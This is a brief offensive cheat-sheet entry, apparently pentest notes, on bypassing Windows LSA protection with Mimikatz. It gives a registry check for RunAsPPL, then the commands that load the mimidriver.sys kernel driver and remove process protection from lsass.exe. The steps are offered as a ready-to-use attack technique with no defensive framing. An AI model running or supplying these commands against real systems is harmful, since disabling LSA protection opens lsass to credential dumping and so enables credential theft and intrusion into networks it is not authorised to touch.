Mimikatz

LSA Protection Bypass

Check if LSA runs as a protected process. The variable for “RunAsPPL” will be set to 0x1 in HKLM\SYSTEM\CurrentControlSet\Control\Lsa.

Upload mimidriver.sys from the mimikatz repo to the same folder as mimikatz.exe, then import.

mimikatz # !+

Remove the protection flags from the lsass.exe process.

mimikatz # !processprotect /process:lsass.exe /remove